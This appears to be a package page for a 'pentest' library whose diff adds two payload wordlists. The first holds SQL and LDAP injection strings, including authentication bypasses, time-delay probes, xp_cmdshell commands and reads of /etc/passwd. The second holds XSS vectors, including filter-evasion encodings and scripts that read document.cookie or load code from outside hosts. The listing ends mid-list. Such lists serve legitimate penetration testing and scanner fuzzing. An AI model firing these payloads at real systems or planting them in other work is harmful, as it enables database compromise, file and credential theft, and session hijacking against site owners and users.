pentest 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
@@ -0,0 +1,193 @@
1
+ <>"'%;)(&+
2
+ |
3
+ !
4
+ ?
5
+ /
6
+ //
7
+ //*
8
+ '
9
+ ' --
10
+ (
11
+ )
12
+ *|
13
+ */*
14
+ &
15
+ 0
16
+ 031003000270000
17
+ 0 or 1=1
18
+ 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
19
+ 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
20
+ 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
21
+ 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
22
+ 1 or 1=1
23
+ 1;SELECT%20*
24
+ 1 waitfor delay '0:0:10'--
25
+ '%20or%20''='
26
+ '%20or%201=1
27
+ ')%20or%20('x'='x
28
+ '%20or%20'x'='x
29
+ %20or%20x=x
30
+ %20'sleep%2050'
31
+ %20$(sleep%2050)
32
+ %21
33
+ 23 OR 1=1
34
+ %26
35
+ %27%20or%201=1
36
+ %28
37
+ %29
38
+ %2A%28%7C%28mail%3D%2A%29%29
39
+ %2A%28%7C%28objectclass%3D%2A%29%29
40
+ %2A%7C
41
+ ||6
42
+ '||'6
43
+ (||6)
44
+ %7C
45
+ a'
46
+ admin' or '
47
+ ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
48
+ ' and 1 in (select var from temp)--
49
+ anything' OR 'x'='x
50
+ "a"" or 1=1--"
51
+ a' or 1=1--
52
+ "a"" or 3=3--"
53
+ a' or 3=3--
54
+ a' or 'a' = 'a
55
+ &apos;%20OR
56
+ as
57
+ asc
58
+ a' waitfor delay '0:0:10'--
59
+ '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
60
+ bfilename
61
+ char%4039%41%2b%40SELECT
62
+ declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
63
+ declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
64
+ declare @q nvarchar (4000) select @q =
65
+ declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
66
+ declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
67
+ declare @s varchar(22) select @s =
68
+ declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
69
+ delete
70
+ desc
71
+ distinct
72
+ '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
73
+ '; exec master..xp_cmdshell
74
+ '; exec master..xp_cmdshell 'ping 172.10.1.255'--
75
+ exec(@s)
76
+ '; exec ('sel' + 'ect us' + 'er')
77
+ exec sp
78
+ '; execute immediate 'sel' || 'ect us' || 'er'
79
+ exec xp
80
+ '; exec xp_regread
81
+ ' group by userid having 1=1--
82
+ handler
83
+ having
84
+ ' having 1=1--
85
+ hi or 1=1 --"
86
+ hi' or 1=1 --
87
+ "hi"") or (""a""=""a"
88
+ hi or a=a
89
+ hi' or 'a'='a
90
+ hi') or ('a'='a
91
+ 'hi' or 'x'='x';
92
+ insert
93
+ like
94
+ limit
95
+ *(|(mail=*))
96
+ *(|(objectclass=*))
97
+ or
98
+ ' or ''='
99
+ or 0=0 #"
100
+ ' or 0=0 --
101
+ ' or 0=0 #
102
+ " or 0=0 --
103
+ or 0=0 --
104
+ or 0=0 #
105
+ ' or 1 --'
106
+ ' or 1/*
107
+ ; or '1'='1'
108
+ ' or '1'='1
109
+ ' or '1'='1'--
110
+ ' or 1=1
111
+ ' or 1=1 /*
112
+ ' or 1=1--
113
+ ' or 1=1--
114
+ '/**/or/**/1/**/=/**/1
115
+ ‘ or 1=1 --
116
+ " or 1=1--
117
+ or 1=1
118
+ or 1=1--
119
+ or 1=1 or ""=
120
+ ' or 1=1 or ''='
121
+ ' or 1 in (select @@version)--
122
+ or%201=1
123
+ or%201=1 --
124
+ ' or 2 > 1
125
+ ' or 2 between 1 and 3
126
+ ' or 3=3
127
+ ‘ or 3=3 --
128
+ ' or '7659'='7659
129
+ or a=a
130
+ or a = a
131
+ ' or 'a'='a
132
+ ' or a=a--
133
+ ') or ('a'='a
134
+ " or "a"="a
135
+ ) or (a=a
136
+ order by
137
+ ' or (EXISTS)
138
+ or isNULL(1/0) /*
139
+ " or isNULL(1/0) /*
140
+ ' or 'something' like 'some%'
141
+ ' or 'something' = 'some'+'thing'
142
+ ' or 'text' = n'text'
143
+ ' or 'text' > 't'
144
+ ' or uid like '%
145
+ ' or uname like '%
146
+ ' or 'unusual' = 'unusual'
147
+ ' or userid like '%
148
+ ' or user like '%
149
+ ' or username like '%
150
+ ' or username like char(37);
151
+ ' or 'whatever' in ('whatever')
152
+ ' -- &password=
153
+ password:*/=1--
154
+ PRINT
155
+ PRINT @@variable
156
+ procedure
157
+ replace
158
+ select
159
+ ' select * from information_schema.tables--
160
+ ' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
161
+ ' (select top 1
162
+ --sp_password
163
+ 'sqlattempt1
164
+ (sqlattempt2)
165
+ 'sqlvuln
166
+ '+sqlvuln
167
+ (sqlvuln)
168
+ sqlvuln;
169
+ t'exec master..xp_cmdshell 'nslookup www.google.com'--
170
+ to_timestamp_tz
171
+ truncate
172
+ tz_offset
173
+ ' UNION ALL SELECT
174
+ ' union all select @@version--
175
+ ' union select
176
+ uni/**/on sel/**/ect
177
+ ' UNION SELECT
178
+ ' union select 1,load_file('/etc/passwd'),1,1,1;
179
+ ) union select * from information_schema.tables;
180
+ ' union select * from users where login = char(114,111,111,116);
181
+ update
182
+ '||UTL_HTTP.REQUEST
183
+ ,@variable
184
+ @variable
185
+ @var select @var as var into temp end --
186
+ \x27UNION SELECT
187
+ x' AND 1=(SELECT COUNT(*) FROM tabname); --
188
+ x' AND email IS NULL; --
189
+ x' AND members.email IS NULL; --
190
+ x' AND userid IS NULL; --
191
+ x' or 1=1 or 'x'='y
192
+ x' OR full_name LIKE '%Bob%
193
+ ý or 1=1 --
@@ -0,0 +1,164 @@
1
+ '
2
+ <font style='color:expression(alert('XSS'))'>
3
+ ' onmouseover=alert(/Black.Spook/)
4
+ ' or 2=2
5
+ "
6
+ " or 202
7
+ ";eval(unescape(location))//# %0Aalert(0)
8
+ "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
9
+ "><iframe%20src="http://google.com"%%203E
10
+ "><img src=x onerror=prompt(1);>
11
+ "><img src=x onerror=window.open('https://www.google.com/');>
12
+ '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
13
+ %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
14
+ %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
15
+ &#x61;l&#x65;rt&#40;1)
16
+ &<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
17
+ &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
18
+ &amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
19
+ &lt;IMG """><SCRIPT>alert("XSS")</SCRIPT>">
20
+ &lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;
21
+ &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;
22
+ &lt;SCRIPT SRC=//xss.rocks/.j>
23
+ '); alert('XSS
24
+ \";alert('XSS');//
25
+ <%<!--'%><script>alert(1);</script -->
26
+ <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
27
+ <--`<img/src=` onerror=alert(1)> --!>
28
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
29
+ <<scr\0ipt/src=http://xss.com/xss.js></script
30
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
31
+ <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
32
+ <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
33
+ <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
34
+ <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
35
+ <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
36
+ <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
37
+ <a onmouseover="alert(document.cookie)">xxs link</a>
38
+ <a onmouseover=alert(document.cookie)>xxs link</a>
39
+ <a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
40
+ <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
41
+ <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
42
+ <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
43
+ <BASE HREF="javascript:alert('XSS');//">
44
+ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
45
+ <body onLoad="alert('XSS');"
46
+ <body onunload="javascript:alert('XSS');">
47
+ <body/onload=&lt;!--&gt;&#10alert(1)>
48
+ <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
49
+ <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
50
+ <div/onmouseover='alert(1)'> style="x:">
51
+ <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
52
+ <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
53
+ <form><button formaction=javascript&colon;alert(1)>CLICKME
54
+ <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
55
+ <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
56
+ <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
57
+ <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
58
+ <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
59
+ <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
60
+ <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
61
+ <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
62
+ <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
63
+ <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
64
+ <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
65
+ <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
66
+ <iframe src=http://xss.rocks/scriptlet.html <
67
+ <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
68
+ <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
69
+ <iframe/onreadystatechange=alert(1)
70
+ <iframe/src \/\/onload = prompt(1)
71
+ <IMG DYNSRC=\"javascript:alert('XSS')\">
72
+ <IMG onmouseover="alert('xxs')">
73
+ <img src ?itworksonchrome?\/onerror = alert(1)???
74
+ <IMG SRC= onmouseover="alert('xxs')">
75
+ <IMG SRC=" &#14; javascript:alert('XSS');">
76
+ <img src="/" =_=" title="onerror='prompt(1)'">
77
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
78
+ <IMG SRC="jav&amp;#x09;ascript:alert('XSS');">
79
+ <IMG SRC="jav&amp;#x0A;ascript:alert('XSS');">
80
+ <IMG SRC="jav&amp;#x0D;ascript:alert('XSS');">
81
+ <IMG SRC="javascript:alert('XSS')"
82
+ <img src="javascript:alert('XSS')">
83
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
84
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
85
+ <img src=`xx:xx`onerror=alert(1)>
86
+ <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
87
+ <IMG SRC=java%00script:alert(\"XSS\")>
88
+ <img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
89
+ <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
90
+ <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
91
+ <input value=<><iframe/src=javascript:confirm(1)
92
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
93
+ <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?
94
+ <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
95
+ <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
96
+ <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
97
+ <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
98
+ <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
99
+ <script for=document event=onreadystatechange>getElementById('safe123').click()</script>
100
+ <script itworksinallbrowsers>/*<script* */alert(1)</script ?
101
+ <script src="data:text/javascript,alert(1)"></script>
102
+ <SCRIPT SRC="http:&#47;&#47;xss.rocks/xss.jpg"></SCRIPT>
103
+ <SCRIPT SRC=http://xss.rocks/xss.js?< B >
104
+ <script x> alert(1) </script 1=2
105
+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
106
+ <SCRIPT/SRC="http:&#47;&#47;xss.rocks/xss.js"></SCRIPT>
107
+ <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
108
+ <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
109
+ <SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
110
+ <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
111
+ <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
112
+ <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
113
+ <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
114
+ <script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
115
+ <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
116
+ <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
117
+ <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
118
+ <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
119
+ <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
120
+ <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
121
+ <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
122
+ <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
123
+ <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
124
+ <script>+-+-1-+-+alert(1)</script>
125
+ <script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
126
+ <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
127
+ <script>alert(document.head.childNodes[3].text)</script>
128
+ <script>alert(document.head.innerHTML.substr(146,20));</script>
129
+ <script>alert('XSS');</script>
130
+ <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
131
+ <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
132
+ <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
133
+ <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
134
+ <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
135
+ <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
136
+ <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
137
+ <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
138
+ '<script>window.onload=function(){document.forms[0].message.value='1';}</script>
139
+ <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
140
+ <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
141
+ <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
142
+ <svg contentScriptType=text/vbs><script>MsgBox+1
143
